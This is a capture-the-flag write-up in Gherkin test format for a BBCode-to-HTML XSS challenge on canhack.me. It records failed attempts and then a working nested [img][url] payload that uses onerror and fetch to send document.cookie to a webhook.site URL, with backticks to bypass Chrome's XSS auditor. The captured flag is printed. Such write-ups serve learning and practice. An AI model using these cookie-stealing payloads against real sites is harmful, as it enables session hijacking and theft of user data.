## Version 2.0
## language: en

Feature: bbcode-webclient-canhackme
  Code:
    bbcode
  Site:
    canhack.me
  Category:
    web client
  User:
    danmur
  Goal:
    Get the flag stored on user cookie

  Background:
  Hacker's software:
    | <Software name> | <Version>    |
    | Chrome          | 68.0.3440.75 |
    | Windows OS      | 10           |

  Machine information:
    Given the challenge information
    """
    This service provides convert BBCode to HTML.
    https://bbcode.canhack.me/

    If you find a vulnerability, capture the flag via the URL below.
    https://bbcode.canhack.me/tester
    """
    And the suggestion given at the service link
    """
    Usage: Please enter the parameter like as in this.

    The link redirects to https://bbcode.canhack.me/?code=[b]hello[/b]
    """
    And the information displayed at the tester link
    """
    If you enter the URL of this challenge, I will set the flag in the cookie
    and visit the URL you entered via Google Chrome 68.0.3440.75.
    """
    And that converted BBcode is returned to the user

  Scenario: Fail:escaping-with-quotes
    Given the machine information
    When I try
    """
    [url]"%0A</a><script>alert(1)</script><a>[/url]
    """
    Then I get
    """
    <a href=""<br></a><script>alert(1)
    </script><a>">
    <br>"</a><script>alert(1)</script><a>"
    </a>
    """
    And conclude that special characters are escaped
    And that can not be used for creating html elements

  Scenario: Fail:predefined-payloads
    Given the previous test
    And deep research about BBcode
    When I try xss payloads for BBcode
    """
    Listed on https://jeffchannell.com/Other/bbcode-xss-howto.html
    """
    Then I get no positive results

  Scenario: Fail:nested-tags-url-img
    Given the predefined payloads
    When I try nested tags
    """
    [url][img]onerror=alert(1)[/img][/url]
    """
    Then I get interesting results
    """
    <a href="<img src=" onerror="alert(1)"" alt>
    "">"
    <img src="onerror=alert(1)" alt>
    </a>
    """

  Scenario: Fail:nested-tags-img-url
    Given previous results
    When I try nested tags
    """
    [img][url]
    var url="https://webhook.site/c6b6ae69-d6b1-4a03-a185-d6e0a44db892
      ?theflag=";
    var payload=document.cookie;
    fetch(url.concat(payload));
    //[/url][/img]
    """
    Then I get
    """
    <img src="<a href=" var="" url="&quot;https://webhook.site/c6b6ae69-
    d6b1-4a03-a185-d6e0a44db892?theflag=&quot;;var"
    payload="document.cookie;fetch(url.concat(payload));//&quot;">
    """
    And a payload broken into attributes

  Scenario: Fail:space-free-payload
    Given that spaces broke the payload
    When I try a space-free payload
    """
    [img][url]onerror=javascript:fetch('https://webhook.site/c6b6ae69-d6b1-
    4a03-a185-d6e0a44db892?theflag='.concat(document.cookie));//[/url][/img]
    """
    Then payload fail as it gets detected by xss auditor

  Scenario: Success:grave-accent-payload
    When I try a space-free payload
    """
    [img][url]onerror=javascript:fetch(`https://webhook.site/c6b6ae69-d6b1-
    4a03-a185-d6e0a44db892?theflag=`.concat(document.cookie));//[/url][/img]
    """
    Then xss auditor is not activated
    And flag is sent to webhook
    """
    Query strings
    theflag   flag=CanHackMe{30d8deja1DN4y7e8ahjQtutPRbQ0ou}
    """
    And solve the challenge :D
